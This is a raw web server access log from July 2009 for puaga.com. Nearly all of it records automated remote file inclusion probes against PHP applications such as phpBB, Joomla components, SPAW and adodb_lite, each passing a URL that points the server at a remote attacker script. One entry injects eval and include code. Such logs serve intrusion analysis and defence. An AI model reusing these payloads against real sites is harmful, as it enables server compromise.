79.148.238.69 - - [05/Jul/2009:11:05:59 -0700] "GET /logs/images/errors.php?error=http://www.tsg-darmstadt.de/images/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:06:03 -0700] "GET /logs/access_090525.log//errors.php?error=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:06:03 -0700] "GET /errors.php?error=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:06:03 -0700] "GET /logs//errors.php?error=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:06:14 -0700] "GET /logs/access_090522.log//errors.php?error=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.826" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:06:25 -0700] "GET /errors.php?error=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:06:25 -0700] "GET /logs/access_090525.log//errors.php?error=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:06:25 -0700] "GET /logs//errors.php?error=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:11:07:00 -0700] "GET /logs/access_090522.log//errors.php?error=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:11:07:00 -0700] "GET /logs//errors.php?error=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:11:07:00 -0700] "GET /errors.php?error=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:07:00 -0700] "GET /logs/access_090522.log//errors.php?error=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:07:00 -0700] "GET /errors.php?error=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:07:00 -0700] "GET /logs//errors.php?error=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:07:02 -0700] "GET /logs/access_090522.log//errors.php?error=http://fritzcomforthomes.com/idd.txt??%0D?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:07:12 -0700] "GET /logs//errors.php?error=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:07:12 -0700] "GET /logs/access_090522.log//errors.php?error=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:07:13 -0700] "GET /errors.php?error=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.194.87.219 - - [05/Jul/2009:11:08:17 -0700] "GET /logs///components/com_flyspray/startdown.php?file=http://www.animeforum.com/impex/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
220.181.7.62 - - [05/Jul/2009:11:08:47 -0700] "GET /orange_g/forum/viewtopic.php?p=28031 HTTP/1.1" 404 5258 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)" "puaga.com"
217.169.210.130 - - [05/Jul/2009:11:09:00 -0700] "GET /logs/access_090526.log/images/errors.php?error=http://www.apromote-werbemittel.de/cache/chi.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
217.169.210.130 - - [05/Jul/2009:11:09:00 -0700] "GET /images/errors.php?error=http://www.apromote-werbemittel.de/cache/chi.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
217.169.210.130 - - [05/Jul/2009:11:09:01 -0700] "GET /logs/images/errors.php?error=http://www.apromote-werbemittel.de/cache/chi.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
79.148.238.69 - - [05/Jul/2009:11:09:02 -0700] "GET /logs/access_090531.log/images/errors.php?error=http://www.tsg-darmstadt.de/images/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:10:47 -0700] "GET /logs/access_090525.log%20%20//errors.php?error=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:11:11:09 -0700] "GET /logs/index.php?redir=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:11:11:09 -0700] "GET /logs/access_090511.log/index.php?redir=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.810" "www.puaga.com"
94.229.66.202 - - [05/Jul/2009:11:11:10 -0700] "GET /index.php?redir=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 200 6125 "-" "libwww-perl/5.810" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:11:21 -0700] "GET /logs/access_090525.log%20%20//errors.php?error=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:11:30 -0700] "GET /logs/access_090522.log%20%20//errors.php?error=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:11:53 -0700] "GET /logs/access_090522.log%20%20//errors.php?error=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:11:12:34 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:11:12:35 -0700] "GET /logs/access_090518.log%20%20//admin/spaw/spaw_control.class.php?spaw_root=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:13:02 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:13:02 -0700] "GET /logs/access_090605.log//agendax/addevent.inc.php?agendax_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:13:02 -0700] "GET /agendax/addevent.inc.php?agendax_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.171.190.110 - - [05/Jul/2009:11:13:03 -0700] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.169.210.130 - - [05/Jul/2009:11:13:04 -0700] "GET /logs/access_090527.log/images/errors.php?error=http://www.apromote-werbemittel.de/cache/chi.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
89.171.190.110 - - [05/Jul/2009:11:13:04 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.171.190.110 - - [05/Jul/2009:11:13:04 -0700] "GET /logs/access_090520.log%20%20//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:13:53 -0700] "GET /logs/access_090616.log//agendax/addevent.inc.php?agendax_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
94.23.2.21 - - [05/Jul/2009:11:14:31 -0700] "GET /logs/access_090525.log//errors.php?error=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.223.143.131 - - [05/Jul/2009:11:14:46 -0700] "GET /logs/access_090520.log//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.65.41.165 - - [05/Jul/2009:11:15:25 -0700] "GET /logs///lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mazda-bay.co.uk/includes/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
69.65.41.165 - - [05/Jul/2009:11:15:25 -0700] "GET /logs/access_090524.log///lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mazda-bay.co.uk/includes/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
69.65.41.165 - - [05/Jul/2009:11:15:25 -0700] "GET //lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mazda-bay.co.uk/includes/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
72.30.87.93 - - [05/Jul/2009:11:15:40 -0700] "GET /logs/access_090620.log HTTP/1.0" 200 2004496 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.puaga.com"
69.65.41.165 - - [05/Jul/2009:11:15:50 -0700] "GET /logs/access_090517.log///lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.mazda-bay.co.uk/includes/id.txt???? HTTP/1.1" 404 5258 "-" "libwww-perl/5.812" "www.puaga.com"
80.248.208.177 - - [05/Jul/2009:11:16:33 -0700] "GET /logs/access_090525.log//errors.php?error=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:16:50 -0700] "GET /logs/access_090605.log%20%20//agendax/addevent.inc.php?agendax_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
84.17.129.100 - - [05/Jul/2009:11:16:51 -0700] "GET /logs/access_090525.log//errors.php?error=http://fritzcomforthomes.com/copyright[1].txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:11:17:30 -0700] "GET /logs/access_090518.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:17:36 -0700] "GET /logs/access_090616.log%20%20//agendax/addevent.inc.php?agendax_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:18:00 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:18:00 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:18:01 -0700] "GET /logs/access_090519.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:18:03 -0700] "GET /logs/access_090528.log%20%20//newspublish/include.php?path%5Bdocroot%5D=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.171.190.110 - - [05/Jul/2009:11:18:13 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.171.190.110 - - [05/Jul/2009:11:18:13 -0700] "GET /logs//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.171.190.110 - - [05/Jul/2009:11:18:14 -0700] "GET /logs/access_090520.log%20%20//phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.194.87.219 - - [05/Jul/2009:11:18:51 -0700] "GET /logs///components/com_flyspray/startdown.php?file=http://www.animeforum.com/impex/id? HTTP/1.1" 404 5258 "-" "libwww-perl/5.822" "www.puaga.com"
217.64.195.223 - - [05/Jul/2009:11:20:16 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.64.195.223 - - [05/Jul/2009:11:20:16 -0700] "GET /logs/access_090529.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.64.195.223 - - [05/Jul/2009:11:20:16 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.64.195.223 - - [05/Jul/2009:11:20:16 -0700] "GET /logs/access_090616.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.64.195.223 - - [05/Jul/2009:11:20:16 -0700] "GET /logs/access_090616.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.64.195.223 - - [05/Jul/2009:11:20:16 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
80.237.208.86 - - [05/Jul/2009:11:21:12 -0700] "GET /logs/images/errors.php?error=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
80.237.208.86 - - [05/Jul/2009:11:21:12 -0700] "GET /images/errors.php?error=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
80.237.208.86 - - [05/Jul/2009:11:21:12 -0700] "GET /logs/access_090530.log%20/images/errors.php?error=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.803" "www.puaga.com"
87.255.14.171 - - [05/Jul/2009:11:21:35 -0700] "GET / HTTP/1.0" 200 6109 "http://puaga.com/" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]" "puaga.com"
87.255.14.171 - - [05/Jul/2009:11:21:35 -0700] "GET /forum/index.php HTTP/1.0" 404 5258 "http://puaga.com/forum/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]" "puaga.com"
87.255.14.171 - - [05/Jul/2009:11:21:36 -0700] "GET /phpbb/index.php HTTP/1.0" 404 5258 "http://puaga.com/phpbb/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]" "puaga.com"
87.255.14.171 - - [05/Jul/2009:11:21:37 -0700] "GET /phpbb2/index.php HTTP/1.0" 404 5258 "http://puaga.com/phpbb2/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]" "puaga.com"
87.255.14.171 - - [05/Jul/2009:11:21:37 -0700] "GET /forums/index.php HTTP/1.0" 404 5258 "http://puaga.com/forums/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]" "puaga.com"
87.255.14.171 - - [05/Jul/2009:11:21:38 -0700] "GET /board/index.php HTTP/1.0" 404 5258 "http://puaga.com/board/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 4.0) Opera 7.0 [en]" "puaga.com"
60.43.229.5 - - [05/Jul/2009:11:21:41 -0700] "GET /logs//Neos_Chronos/header.php?base_folder=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:21:42 -0700] "GET /Neos_Chronos/header.php?base_folder=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:21:42 -0700] "GET /logs/access_090614.log//Neos_Chronos/header.php?base_folder=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:11:21:43 -0700] "GET /logs/access_090517.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:11:21:43 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.32.106.32 - - [05/Jul/2009:11:21:49 -0700] "GET /logs/access_090606.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.irishia.net/zerocount/vak.sin? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.32.106.32 - - [05/Jul/2009:11:21:49 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.irishia.net/zerocount/vak.sin? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.32.106.32 - - [05/Jul/2009:11:21:49 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.irishia.net/zerocount/vak.sin? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.32.106.32 - - [05/Jul/2009:11:22:11 -0700] "GET /logs/access_090614.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.irishia.net/zerocount/vak.sin? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:11:22:47 -0700] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:11:22:47 -0700] "GET /logs/access_090526.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.64.195.223 - - [05/Jul/2009:11:23:27 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.64.195.223 - - [05/Jul/2009:11:23:28 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.64.195.223 - - [05/Jul/2009:11:23:28 -0700] "GET /logs/access_090616.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.64.195.223 - - [05/Jul/2009:11:23:43 -0700] "GET /modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.64.195.223 - - [05/Jul/2009:11:23:43 -0700] "GET /logs/access_090616.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.64.195.223 - - [05/Jul/2009:11:23:43 -0700] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.64.195.223 - - [05/Jul/2009:11:23:46 -0700] "GET /logs/access_090529.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:11:23:51 -0700] "GET /logs/access_090517.log%20%20//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
65.55.106.219 - - [05/Jul/2009:11:24:01 -0700] "GET /robots.txt HTTP/1.1" 200 36 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.puaga.com"
217.64.195.223 - - [05/Jul/2009:11:24:03 -0700] "GET /logs/access_090529.log%20%20//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://dfpyvu.mxl.uabc.mx/trash/idxx.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.32.106.32 - - [05/Jul/2009:11:24:26 -0700] "GET /logs/access_090606.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.irishia.net/zerocount/vak.sin? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
70.32.106.32 - - [05/Jul/2009:11:24:30 -0700] "GET /logs/access_090614.log%20%20//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.irishia.net/zerocount/vak.sin? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:11:24:34 -0700] "GET /logs/access_090526.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:11:24:43 -0700] "GET /logs/access_090519.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:25:28 -0700] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:25:30 -0700] "GET /logs/access_090614.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:25:32 -0700] "GET /components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.32.56.166 - - [05/Jul/2009:11:25:39 -0700] "GET /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.irishia.net/zerocount/vak.sin? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.32.56.166 - - [05/Jul/2009:11:25:39 -0700] "GET /logs/access_090606.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.irishia.net/zerocount/vak.sin? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.32.56.166 - - [05/Jul/2009:11:25:39 -0700] "GET /logs//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.irishia.net/zerocount/vak.sin? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.32.56.166 - - [05/Jul/2009:11:26:02 -0700] "GET /logs/access_090614.log//components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=http://www.irishia.net/zerocount/vak.sin? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.148.238.69 - - [05/Jul/2009:11:26:39 -0700] "GET /logs/access_090512.log/images/errors.php?error=http://www.tsg-darmstadt.de/images/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
79.148.238.69 - - [05/Jul/2009:11:26:40 -0700] "GET /images/errors.php?error=http://www.tsg-darmstadt.de/images/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
79.148.238.69 - - [05/Jul/2009:11:26:42 -0700] "GET /logs/images/errors.php?error=http://www.tsg-darmstadt.de/images/id.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
218.27.203.107 - - [05/Jul/2009:11:27:09 -0700] "GET /logs/access_090521.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.43.229.5 - - [05/Jul/2009:11:27:22 -0700] "GET /logs/access_090620.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.euroexpo.ro/atmail/remember.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.82.228.83 - - [05/Jul/2009:11:27:56 -0700] "GET /components/com_minibb.php?absolute_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.82.228.83 - - [05/Jul/2009:11:28:00 -0700] "GET /logs/access_090525.log%20%20//components/com_minibb.php?absolute_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.82.228.83 - - [05/Jul/2009:11:28:00 -0700] "GET /logs/access_090525.log%20%20//components/com_minibb.php?absolute_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.82.228.83 - - [05/Jul/2009:11:28:00 -0700] "GET /logs//components/com_minibb.php?absolute_path=http://www.clangamingleague.com/ladder//themes/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
